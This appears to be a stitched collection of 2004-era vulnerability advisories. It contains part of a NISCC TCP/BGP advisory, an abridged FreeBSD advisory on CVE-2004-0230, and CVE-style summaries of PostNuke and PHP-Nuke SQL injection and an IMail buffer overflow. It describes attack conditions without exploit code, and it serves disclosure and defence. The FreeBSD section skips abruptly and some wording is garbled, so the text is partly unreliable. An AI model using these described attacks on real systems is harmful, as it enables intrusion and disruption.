bgcolor="#FFFFaf">A new version of the Multi-Router Looking Glass tool (4.3.0) has been released.&nbsp; This includes a patch that prevents a remote user from utilising the &quot;sh ip bgp neighbors&quot; functionality.&nbsp; This new version is available from <a href="ftp://ftp.enterzone.net/looking-glass/CURRENT/"> ftp://ftp.enterzone.net/looking-glass/CURRENT/</a>. </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="nec"></a>NEC</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> NEC is aware of this vulnerability and is trying to determine potential impacts on our products.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="nortel"></a>Nortel Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Nortel Networks has evaluated this issue and testing has confirmed that it is possible to successfully exploit this vulnerability. However, the preconditions for a successful exploitation require levels of access to the network that are unlikely to be achieved in a normal network operating environment; furthermore, such levels of access would enable other forms of attack with much greater impact than that achievable by exploiting this vulnerability.<br> <br> Nortel Networks is continuing to validate that this vulnerability has no serious consequences for Nortel equipment, and will update this statement periodically.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="polycom"></a>Polycom</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Polycom has investigated the potential impact to our products for NISCC Advisory 236929.<br> <br> Specific product information will be provided at <a HREF="http://www.polycom.com/securitycenter"> http://www.polycom.com/securitycenter</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="seccomp"></a>Secure Computing Corporation</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">The Sidewinder and Sidewinder G2 firewalls offer protection against this attack at all releases. As application-layer firewalls, Sidewinder and Sidewinder G2 offer protection to systems behind the firewall as well as protecting management connections to the firewall.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="yamaha"></a>Yamaha</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Pending.</td> </tr> </table> <br> <br> <b>Acknowledgements</b><br> <br> NISCC wishes to thank the following:<br> <br> <table border="0" cellpadding="6" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">Steve Bellovin, Rob Thomas and Paul Watson for their contributions to this advisory.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">Cisco Systems Inc. and Juniper Networks Inc. for their help with the content of this advisory and for their support during the disclosure process.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">JPCERT/CC for their assistance in co-ordinating this disclosure in Japan.</td> </tr> </table> <br> <br> <b>References</b> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7"> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Internet Engineering Task Force</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 793 Transmission Control Protocol</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc793.txt"> http://www.ietf.org/rfc/rfc793.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 1323 TCP Extensions for High Performance</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%"><a href="http://www.ietf.org/rfc/rfc1323.txt"> http://www.ietf.org/rfc/rfc1323.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 1771 A Border Gateway Protocol 4 (BGP-4)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc1771.txt"> http://www.ietf.org/rfc/rfc1771.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 2385 Protection of BGP Sessions via the TCP MD5 Signature Option</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc2385.txt"> http://www.ietf.org/rfc/rfc2385.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 2827 Network Ingress Filtering</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc2827.txt"> http://www.ietf.org/rfc/rfc2827.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 3562 Considerations for the TCP MD5 Signature Option</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc3562.txt"> http://www.ietf.org/rfc/rfc3562.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 3682 Generalized TTL Security Mechanism</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc3682.txt"> http://www.ietf.org/rfc/rfc3682.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Internet Draft - Transmission Control Protocol security considerations</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt"> http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>NISCC</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Best Practice Guidelines - Border Gateway Protocol</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf"> http://www.niscc.gov.uk/BGP Filtering Guide.pdf</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Configuration and Tuning Guides</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Secure BGP Template for Cisco IOS</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.cymru.com/Documents/secure-bgp-template.html"> http://www.cymru.com/Documents/secure-bgp-template.html</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">JUNOS Secure BGP Template</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.qorbit.net/documents/junos-bgp-template.pdf"> http://www.qorbit.net/documents/junos-bgp-template.pdf</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">UNIX IP Stack Tuning Guide</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.cymru.com/Documents/ip-stack-tuning.html"> http://www.cymru.com/Documents/ip-stack-tuning.html</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Other Documents</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">SANS discussion on egress filtering</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.sans.org/y2k/egress.htm"> http://www.sans.org/y2k/egress.htm</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Vulnerability Databases</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Common Vulnerabilities and Exposures (CVE)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230"> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Open Source Vulnerability Database (OSVDB)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4030"> http://www.osvdb.org/displayvuln.php?osvdb_id=4030</a></td> </tr> </table> <p> <br> <br> <b>Contact Information</b><br> <br> The NISCC Vulnerability Management Team can be contacted as follows:<br> </p> </p> <table border="1" width="87%" cellspacing="3" cellpadding="5"> <tr> <td width="30%" valign="top">Email</td> <td width="70%"><a href="mailto:vulteam@niscc.gov.uk">vulteam@niscc.gov.uk</a> <br><i>(Please quote the advisory reference in the subject line.)</i></td> </tr> <tr> <td width="30%" valign="top">Telephone</td> <td width="70%"> +44 (0)20 7821 1330 Extension 4511 <br><i>(Monday to Friday 08:30 - 17:00)</i></td> </tr> <tr> <td width="30%" valign="top">Fax</td> <td width="70%"> +44 (0)20 7821 1686</td> </tr> <tr> <td width="30%" valign="top">Post</td> <td width="70%"> Vulnerability Management Team<br> NISCC<br> PO Box 832<br> London<br> SW1P 1BG</td> </tr> </table> <br> We encourage those who wish to communicate via email to make use of our PGP key. This is available from <a href="http://www.uniras.gov.uk/UNIRAS.asc">http://www.uniras.gov.uk/UNIRAS.asc</a>.<br> <br> Please note that UK government protectively marked material should not be sent to the email address above.<br> <br> If you wish to be added to our email distribution list, please email your request to <a href="mailto:uniras@niscc.gov.uk">uniras@niscc.gov.uk</a>.<br> <br> <br> <b> What is NISCC?</b><br> <br> For further information regarding the UK National Infrastructure Security Co-Ordination Centre, please visit the NISCC web site at: <br> <a href="http://www.niscc.gov.uk/aboutniscc/index.htm">http://www.niscc.gov.uk/aboutniscc/index.htm</a><br> <br> Reference to any specific commercial product, process or service by trade name, trademark manufacturer or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by NISCC. The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes.<br> <br> Neither shall NISCC accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this notice.<br> <br> \xa9 2004 Crown Copyright<br> <br> Revision History<br> <br> <table border="0" width="100%"> <tr> <td width="23%"> <font size="2">April 20</font><SMALL>, 2004: </SMALL> </td> <td width="77%"> <SMALL> Initial release (1.0)</SMALL></td> </tr> <tr> <td width="23%"> <font size="2">April 21, 2004:</font></td> <td width="77%"> <font size="2">Corrected hyperlinks (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Cisco (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Mitel (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted MRLG patch reference (1.2)</font></td> </tr> <tr> <td width="23%"> <font size="2">April 22, 2004:</font></td> <td width="77%"> <font size="2">Revised impact statement for Certicom (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Nortel Networks (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Secure Computing Corporation (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted references section (1.4)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Lucent Technologies (1.4)</font></td> </tr> </table> <br> &lt;End of NISCC Vulnerability Advisory><br> </div> </body> </html>. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:19.tcp Security Advisory The FreeBSD Project Topic: Denial of Service in TCP packet processing Category: core Module: inet Announced: 2014-09-16 Credits: Jonathan Looney (Juniper SIRT) Affects: All supported versions of FreeBSD. Corrected: 2014-09-16 09:48:35UTC (stable/10, 10.1-PRERELEASE) 2014-09-16 09:48:35 UTC (stable/10, 10.1-BETA1-p1) 2014-09-16 09:50:19 UTC (releng/10.0, 10.0-RELEASE-p9) 2014-09-16 09:49:11 UTC (stable/9, 9.3-STABLE) 2014-09-16 09:50:19 UTC (releng/9.3, 9.3-RELEASE-p2) 2014-09-16 09:50:19 UTC (releng/9.2, 9.2-RELEASE-p12) 2014-09-16 09:50:19 UTC (releng/9.1, 9.1-RELEASE-p19) 2014-09-16 09:49:11 UTC (stable/8, 8.4-STABLE) 2014-09-16 09:50:19 UTC (releng/8.4, 8.4-RELEASE-p16) CVE Name: CVE-2004-0230 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:http://security.FreeBSD.org/>. New TCP connections are initiated using special SYN flag in a datagram. Sequencing of data is controlled by 32-bit sequence numbers, that start with a random value and are increased using modulo 2**32 arithmetic. In case one of the two port numbers is unknown, a successful attack requires less than 2**17 packets spoofed, which can be generated within less than a second on a decent connection to the Internet. Workaround It is possible to defend against these attacks with stateful traffic inspection using a firewall. This can be done by enabling pf(4) on the system and creating states for every connection. Even a default ruleset to allow all traffic would be sufficient to mitigate this issue. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch # fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch.asc # gpg --verify tcp.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r271668 releng/8.4/ r271669 stable/9/ r271668 releng/9.1/ r271669 releng/9.2/ r271669 releng/9.3/ r271669 stable/10/ r271667 releng/10.0/ r271669 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:http://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII

SQL injection vulnerability in PostNuke 7.2.6 and earlier allows remote attackers to execute arbitrary SQL via (1) the sif parameter to index.php in the Comments module or (2) timezoneoffset parameter to changeinfo.php in the Your_Account module. This issue is due to a failure of the application to properly sanitize user supplied URI input. This may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation

Stack-based buffer overflow in Ipswitch IMail Express Web Messaging before 8.05 might allow remote attackers to execute arbitrary code via an HTML message with long "tag text.". A remotely exploitable buffer overrun vulnerability has been reported in Ipswitch IMail Express. This condition exists in the Web Messaging component and is due to insufficient bounds checking of HTML messages. This issue could potentially be exploited to execute arbitrary code in the context of the software. Ipswitch IMail is a powerful mail service program. No detailed vulnerability details are currently available

SQL injection vulnerability in the bblogin function in functions.php in PHP-Nuke 6.x through 7.2 allows remote attackers to bypass authentication and gain access by injecting base64-encoded SQL code into the user parameter. francisco burzi of php-nuke Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input. As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information